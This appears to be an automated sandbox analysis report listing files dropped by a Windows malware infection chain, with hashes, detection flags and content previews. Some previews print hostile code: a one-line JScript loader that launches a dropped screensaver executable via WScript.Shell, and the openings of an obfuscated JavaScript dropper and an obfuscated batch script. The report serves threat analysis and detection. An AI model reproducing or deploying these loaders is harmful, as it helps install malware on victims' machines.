SHA-256:	79465C0473E69D4916E168621D68EACBD55518070716413B9495D484B16DCA87
SHA-512:	005293ECF7C389B8FE4C098831F863DCDA1AACE8E8A84C22A2AA90E60BEF3C2171A43DBE849B19F91DCF355CF0FCB803952B88393B30194AA7AD5AE0D5CB3B20
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	184
Entropy (8bit):	4.734832042306239
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+Ro6p4EkD5mJKEufLOksaYuWGplZo5uWAX+Ro6p4EkD5ml:RiJBJHonwWDKaJkDjEYRswWGrywWDKaj
MD5:	C9EE39C71A07F0DFE15F88BC91618CE8
SHA1:	A55D4A3C53F75DEBA9EE14A89047931D59CF328F
SHA-256:	463231CD31CB7A685624EFD5A04ADC02BC1AFD6459488A5239AB5D4AEA071699
SHA-512:	EB6A76555ECB07A52815ACEB38FB21533FAA117F6A50F776CC9A9FDB011EBCD1ECDCADD12380333D4FB7CAB3F7865E0D4680F4DC41BB9EDD1D5C6069490986E1
Malicious:	true
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\DanielPulse.scr\" \"C:\\Users\\user\\AppData\\Local\\CloudSynergy Solutions\\R\"")

C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: FwR7as4xUq.exe, Detection: malicious, Browse Filename: InsertSr.exe, Detection: malicious, Browse Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: eddzD2MA12.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\CloudSynergy Solutions\R

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	data
Category:	dropped
Size (bytes):	257339
Entropy (8bit):	7.999363363076799
Encrypted:	true
SSDEEP:	6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
MD5:	606D3FBBD2B3F54B73E2B049EBC1CB66
SHA1:	E3D039B3F84158DBC882D62614AEC3A66766509F
SHA-256:	4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
SHA-512:	35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
Malicious:	false
Preview:	>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.\|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V.......U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W....u...a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-\|Cdg.L.........J.8{\| ..5...-.h....!.... f.W..p.^....&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bo[1].js

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with very long lines (3307), with no line terminators
Category:	dropped
Size (bytes):	3307
Entropy (8bit):	5.798639475646749
Encrypted:	false
SSDEEP:	48:LcX5oACw2LCeugnjpENEi1sTEliazvwUtUs6K7n+pCJ6H/2jNUfv4UcjK9lt9Jur:aQw2WexY8mzZUXKSppH/2hUf5cilq
MD5:	6E11083E345266E3117481D9B141B3B9
SHA1:	B63B6483142EF562980D7CB46EBFE9D0CAE80ECD
SHA-256:	62431A957C25A1D3E9207C350C5CBA7E04DDFA2DDD4F0DD6F0D0CF0580EE5B1E
SHA-512:	F1EF96983140C9441C4FA12E45AFC178940F38A0DDB00FCC6C871F4427518ACD788A8FC026413A7586A0F4F0C1442C8591197711FC1FE23AACF37A467FD13202
Malicious:	false
Preview:	var m=b;(function(c,d){var j=b,e=c();while(!![]){try{var f=-parseInt(j(0x1a3))/0x1(-parseInt(j(0x1b1))/0x2)+parseInt(j(0x1a1))/0x3(parseInt(j(0x1ad))/0x4)+parseInt(j(0x1aa))/0x5+-parseInt(j(0x1a5))/0x6+-parseInt(j(0x1ac))/0x7+-parseInt(j(0x19b))/0x8+-parseInt(j(0x1b3))/0x9(parseInt(j(0x1a2))/0xa);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift']());}}}(a,0xc47e1));var _0xe91ad=_0x2b73;function _0x4524(){var k=b,c=[k(0x19c),k(0x1a7),'14qYAfZk',k(0x1ba),k(0x1ae),'5990904movKoa','3087036mOTiSC',k(0x1b2),k(0x1b6),k(0x1bc),k(0x19e),k(0x1a6),k(0x1b8),k(0x1b9),k(0x1a9),k(0x1af),k(0x1b4),'WScript.Shell',k(0x1b7),k(0x1a0),'231740BvWnZJ',k(0x1bb)];return _0x4524=function(){return c;},_0x4524();}(function(c,d){var l=b,e=_0x2b73,f=c();while(!![]){try{var g=parseInt(e(0xd3))/0x1+-parseInt(e(0xde))/0x2+parseInt(e(0xdb))/0x3+parseInt(e(0xca))/0x4(-parseInt(e(0xd5))/0x5)+-parseInt(e(0xd2))/0x6+parseInt(e(0xce))/0x7*(parseInt(e(0xd1))/0x8)+-parseInt(e(0xda))/0x9;if(g===d)br

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21979
Entropy (8bit):	5.049158677118914
Encrypted:	false
SSDEEP:	384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
MD5:	E85ADBB7806D6C2B446681F25E86C54E
SHA1:	7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
SHA-256:	1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
SHA-512:	D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
Malicious:	false
Preview:	PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\220239\Carter.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: c2.hta, Detection: malicious, Browse Filename: FwR7as4xUq.exe, Detection: malicious, Browse Filename: InsertSr.exe, Detection: malicious, Browse Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: fT0L8msd6q.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: qaHUaPUib8.exe, Detection: malicious, Browse Filename: eddzD2MA12.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\220239\F

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	257339
Entropy (8bit):	7.999363363076799
Encrypted:	true
SSDEEP:	6144:duwZYX3zopteLfBJWbfnge8mKtNAUe+v8iswCJziP7sVf:gdX3zsteLfSzHstXLXswMOsN
MD5:	606D3FBBD2B3F54B73E2B049EBC1CB66
SHA1:	E3D039B3F84158DBC882D62614AEC3A66766509F
SHA-256:	4176B81C10024AA77D43BF06A7EAC6B5EB40427B11369C9051DCB4D1D102D437
SHA-512:	35B4F513508C7231AFAB55850ECD954E147839B45E7B0C1F73D983AD0AFF072E582E3CB08A9B288A0FC17E277CA8A80949A0DB9A8488F6D603F390307213D402
Malicious:	false
Preview:	>I.......<6...P.a... ..m.u.!'S7ba...d.....<.j..Rt.\|...P.<.....X.h5...@......./.p...~.Vx....m...J.......qQC..K\%..././.R...-....o........J.5....HF.e.....MJR...A..sC.V.......U..e.}.@.......l.....j......tt.G..Z...7\.3.a.TK[..g.9.W..Nl.o...%O.o.;T.6{...Np.-M....vF.y'.#..y&..w...W.b..X..B_..Y.4.E...W.5I(d8.P...t.N..]....T.y.v~.7...p.0yQ...<...'-)?K.w.o.[....W...f._3,!M..~..Vi.........\8xl.)8......y...Rr.2APH.}.Y.^.W..:......p.o.../....c.\../ea..Vi..@?....P...6Y....C^..a...=...%.m.^..R..J.h....4..&{... ...u....K.@~.$..PC....t....s...@.....0..@.5l..i<9f.....2...$w........3....Orfep......M.$...l.q.&G.0...b.@.C.Y...4.......t.E}.K..?'Q./..Eg.l]e...AXT....YJgG~.<.y......S.=&7B..S..>.....yc.W....u...a...o.s..Y.......6..{......OEq.l_.:.."\2b.nc#.-\|Cdg.L.........J.8{\| ..5...-.h....!.... f.W..p.^....&..].S6..=yj.....j.5[.). ^..L...n,..........Z.......M...<.:T8.....C,..'i.zp...z...9z...sq...b.E^.4=~.f..p.qgv......^.".c... ...eg..="..n

C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\220239\Carter.pif
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	65440
Entropy (8bit):	6.049806962480652
Encrypted:	false
SSDEEP:	768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
MD5:	0D5DF43AF2916F47D00C1573797C1A13
SHA1:	230AB5559E806574D26B4C20847C368ED55483B0
SHA-256:	C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
SHA-512:	F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P.....0.."........(......-.r...p.rI..p(....s....z....0..........(....~P.....o........(....n(.....(..........%...(....~(.....(..........%...%...(.....(.....(..........%...%...%...(....V.(......}Q.....}R.....{Q.....{R......0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

C:\Users\user\AppData\Local\Temp\Automatic

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	89403
Entropy (8bit):	7.99813128639969
Encrypted:	true
SSDEEP:	1536:WvzNmlhJS1NqPa2dvcaUjV1a8lW12m0tJURtrJFubAca7D87sxHf:Wv8iNCDcS8kQsz2bAcaE7sxHf
MD5:	3FF8403A4564EE7F0732F6A1ECEB194C
SHA1:	C9EFFAC660CDD5B789928EB9C1AFF4A79F2EAED6
SHA-256:	7EADEF0349D3391EAAA4931B910A12239F118AF38FFEBF5C54C68BDC5CEAAA3E
SHA-512:	8859C01D4CC10D0F09FD86F56B30E38073C973397775741BCEEC26F3F12423E22BA3B765C234D42A5DF705021AFA8DE2EF50E90F9E01931060A94ECEE1CEE698
Malicious:	false
Preview:	..o...>........0%........]Z7EK.K(.I....Y...(..cJ.ls....r. .eD...G.A.K.t.......b.H.,\|..1.\|k..T.-.-..{uF....[h....e...OA+....8:.{.H....y.....a.T...A%m..z..]2.l....j./..=.b....x..FT..h1})...s.....G..e...h....o.GQk..].6..k:...H...H...q...Y.+^.#....&JG{x7Lz....o...8O..j.G/.Z4..2q=..9.0.Y3.6B@.]^.>.F.@1..v..GK.R..8-(.0(z..`B...aO....6E....1.po.B.-&.h.:.:....L..!N..=.1....n.i...~..17<........r.`.W.Q..A.=.?....Q^....A.!...h.._......Jw.......EhGR0..Ki:U.4...".....o..l.VoZ.....Rv.lz...... .(..2v.t..q.B..!g.S..._....x.~,o.8..@M.........C.q.oY...V...R.........S..4..r4...g.u.vy[.js....5[l6p.....F.^..Au.....N..my.)y.......]._....22.V\|..N..i.......=.%<.Z..D.Q.u..d.[wdz^7.}.{....n,.......j........_i..oXl...#...J!...\..c..Q..p.=.PN.\|.Y...1..<...g.e.......0..3..u..tP=8....bA...w...@].$...'?......*....V.J.ko..f"...o..[]F...V..$..6......A=..t.v.W.........zub..d.y>X9/.<0.........Oi.u..Y.S.W..L2...$.A.}....x....2../F....R.1.:7"\\|GU.v.'.;.

C:\Users\user\AppData\Local\Temp\Fires

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.99803755231603
Encrypted:	true
SSDEEP:	1536:4HUCJTibUP87NmFlHoTTX91f9FjcCKxMxdcAwPPLDAdd+DgEbGOHNN+d6n3hlcFD:SWbv8F94f1Fjc6x4Tmd+DeOtN+dURlav
MD5:	DC54D0D4B55783075A2501B87D0C8D31
SHA1:	FEF29A787871C091260C34301D451BE56601CF53
SHA-256:	EFEC3D913AAF25D26D8EC4652340E132A0739B319DB62B12D2332461A2544777
SHA-512:	EABDCFE474DB5B0EA0CC5AE6D3E0CA11B2D785F2C47E1716983E7196CBDE306B69111123C602C40CCABF72481694D7C32E8FE61AE2C38581D04F768A869839CE
Malicious:	false
Preview:	.ke..)....-}f..-...._.....5..'......&.4X...I../...<.....l..4@B..."..J.).FJ.v:^....%.././....+.9..5}....\l.jS..3...ev.B...%...S.S...cG.=j.I).i..\...... .2.q<..v+..N.B.^.%.r.k..4...7....pB..G.B7.Y.................-t.e.(.Q...C5....j.h}.n.....Z..........zE.~..I.t....XY...b..P\|......\..3..hc].......)..k.....[_.J.g&\..3..a..h....w...h...J...e.n.sg,.j..r...N..K{..._1..by..2]j.Z.cb.D....D.b...9.t..D.M.2-...%.L~$6..aZ.Z.h't..\|....i.Z...&..(...Z.....f...P..f.?.[......D....l.......v\|..e...,......?...+.jvG..)...Z.Trx...H.{.......v..f.0.Mc..e'k.....1..@..k.Jvj..H..v.U'J@..U.].Z..P>Pp..<.+.X8B.R.....,%.y..k..._(.HG..\|..%.CaI......P.....nN..&F.hH...+....\|P.h..)$"Em.(-./..+.....!.........BI$'.........x....b...o.b.v......._.....#.j.."[. ..b..h......j..MH.".a^.q...fF.HB.w..)D.......Ms:.a...h.....QL.~3..v8....[..C.....GA..jo...,..Z..m....Z`.W2.<..N....L..w.e.uoV9..d..E..C.d8...C...?....e....M9P.x2.Gt.yv.6..e.~.?@j....L^A*Z....L.Y..C..e....0...]@....qZ".

C:\Users\user\AppData\Local\Temp\MSI47f5b.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.4963635481307946
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8ma3slgYle:Qw946cPbiOxDlbYnuRK4sldw
MD5:	FAFC7088BF657F73B5D7F851083A4670
SHA1:	09CDC2DF539C10393DD47B5F3A72F9061036E200
SHA-256:	D116E0764657813FB370FBF554510A00329FE6ED11A7392610FF480731BCBEF9
SHA-512:	E0D41BF6CAE521ADF5C0EF60E5490E9BC5C382BECB468444F1192DFB4C1C3E5D741C284DE1108DB9ADEA609522021128C95ADAA10A467AFC4AF7B2D4E2B55892
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.1.2./.2.0.2.4. . .1.2.:.0.3.:.1.6. .=.=.=.....

C:\Users\user\AppData\Local\Temp\Missouri

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	885684
Entropy (8bit):	6.621979600120346
Encrypted:	false
SSDEEP:	12288:UV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:uxz1JMyyzlohMf1tN70aw8501
MD5:	B52BB2B76BB34CE2AD510641DB438931
SHA1:	316D724878B112E97A432EC85D10A993BF073274
SHA-256:	0AE073B61844F6F34FA87101DC67487FE4256547A5633D8362BBE659B3CBBFED
SHA-512:	06A3DF9F4910E6C45A074368F3182A37CFC1DE91C749FDBF9C874FB23A555EDB1425534B62E63B23823744A7DF89A677A0455C08563B10F5F74F155014865702
Malicious:	false
Preview:	..=DxL..=HxL...\|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......\|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.........xL....t{..xL.3.V....0...M.8V:t..V:9............}.........t...td...t....tQ...tC~)....1.~8.uVWQ....I....t....t..u..#0...F8.3.@^_]...3........}......F8.....

C:\Users\user\AppData\Local\Temp\Phpbb

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (449), with CRLF line terminators
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.189766528618456
Encrypted:	false
SSDEEP:	192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
MD5:	3D5A3A147ED08ACC8A92B1B79225B16C
SHA1:	E9E24609206C346DF77B7E49E48838604765339D
SHA-256:	D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
SHA-512:	8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
Malicious:	false
Preview:	Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

C:\Users\user\AppData\Local\Temp\Phpbb.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (449), with CRLF line terminators
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.189766528618456
Encrypted:	false
SSDEEP:	192:QbI91NlQY0j2psWVK6A7lsOwoo3YbYfW/hATo2GI3udfA7Lq+a:Qs91NlL/als5onYfeAs2GI38Ai
MD5:	3D5A3A147ED08ACC8A92B1B79225B16C
SHA1:	E9E24609206C346DF77B7E49E48838604765339D
SHA-256:	D0FC91805EF886D885E18D4988D1DD36BEF690E1A06ACE34D11913766904A64D
SHA-512:	8767663208DAF55592BC700FB2150418CDC042F74AEF461B4B0F6080EA839EEBF60C1AC1EB3CC0FB27C09157549E87A89C93731DC41D048D3007FBD604A0F5CD
Malicious:	false
Preview:	Set Christine=n..RGmwCho-Paste-Calgary-..dwfgTheory-Agreed-Hyundai-Signing-Blue-Romance-Conclusion-..vKKim-..IDmUIndividually-Days-Ez-Diy-Currently-Detector-Works-Classic-..zcFifteen-Latitude-Here-Resolution-Wing-..FickPage-Consumers-Scotland-Venezuela-Reprints-..ZCzClassified-Strip-Appeals-Feels-..PpRRelease-Sip-Scary-Vendor-Floyd-Mortality-Bald-Vbulletin-Pm-..UNbjPrincess-Authority-Ice-Encounter-Defensive-Publishers-Anchor-..eepHHeather-Focus-Bin-Horrible-..Set Edward=Q..keKept-Yards-Kills-Celtic-..HaFrReproduction-Hartford-Mass-Islands-Submission-Since-Belly-..NYMu-Mozambique-Longest-Throughout-Voyeurweb-..KjRnRemain-Japan-Keywords-Fathers-Assault-Adams-..BWHXRadios-..ujYNegative-..ntVVWake-Depend-Spokesman-Portion-..aklPillow-Aware-..BNthAnswered-Soccer-Organizer-..Set Justice=c..CUGxTold-Chicks-Lg-Agreements-Maritime-See-Disposition-Garlic-..aYAccessed-Endorsement-Ought-Iraqi-Orientation-Numeric-..UGnGear-Wonderful-Quantum-Called-..GVCConsiderable-Darwin-Dozen-Japanese-Thong-Revie

C:\Users\user\AppData\Local\Temp\Response

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	7.997642474583827
Encrypted:	true
SSDEEP:	1536:C8rW6c7wZq1wCXK1yDWHgpipHZAGuQetnB3vzrCtvPCoj2fQCyqMsgkE:dK7wZdCX3zopyyet1fmvPCToq8
MD5:	1C2CD5510A8B8BE255D26B74FBFC61EF
SHA1:	8DD84BE3314E46C2A41BFBD2D9873859D3F88B54
SHA-256:	8F7445D8F645AF42CC36F82642DF091756CF5DF22C5E32E695C5EB999194B0E5
SHA-512:	E0CE8FDB77E40CB073A0FEEDDCBCFF075439F601224374445E578B4BC02AC01B3A114E0612D7A6D90214F1D4AC2ACFE380DF4E8DBD3E428A8D9496E39C4F22A7
Malicious:	false
